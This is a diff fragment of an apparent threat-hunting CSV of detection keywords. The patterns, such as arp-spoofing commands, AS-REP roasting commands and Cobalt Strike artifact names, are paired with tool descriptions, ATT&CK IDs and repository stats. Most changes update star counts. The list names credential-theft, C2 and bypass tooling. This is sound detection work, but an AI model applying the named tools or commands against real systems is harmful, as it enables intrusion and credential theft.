T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*armory install windows-pivot*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*Arno0x/DBC2*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Arno0x/EmbedInHTML*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*Arno0x/WebDavC2*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" -"*arp.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*arp.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*arp.spoof.targets*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*arp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*arpspoof -i *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1296","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" -"*ArpSpoofer*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp.spoof.targets*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arp_mitm.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*arp_spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*arpspoof -i *","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" +"*ArpSpoofer*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*arpspoofing.py *","offensive_tool_keyword","arpspoofing","arp spoofing scripts","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/arpspoofing","1","0","N/A","N/A","1","15","1","2022-03-10T04:44:36Z","2021-06-29T22:57:51Z" "*arsenal_kit.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifact.cna*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" @@ -7317,42 +7462,42 @@ "*artifact64svcbig.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*artifactbig64.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*artifactuac*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*aruba2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*aruba2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*AS 'Login that can be impersonated'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*as 'Owner that can be impersonated'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*ASBBypass.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*ASBBypass.ps1*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*ASBBypass.ps1*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","1","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" "*ASRenum-BOF.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","10","10","121","15","2022-12-28T17:27:18Z","2022-12-28T14:41:02Z" -"*asrep_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*asrep2kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*asreprc4_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*asreproast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Asreproast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*asrep_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asrep2kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*asreprc4_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asreproast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Asreproast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*ASREPRoast.ps1*","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","2","180","57","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z" "*asreproast_*.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*asreproast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*asreproast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*ASreproasting.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*ASRepToHashcat*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" -"*Assemblies/SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","615","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" +"*asreproast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*asreproast_output_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ASreproasting.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*ASRepToHashcat*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*Assemblies/SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*assembly *.asm *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*assembly *.exe *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" 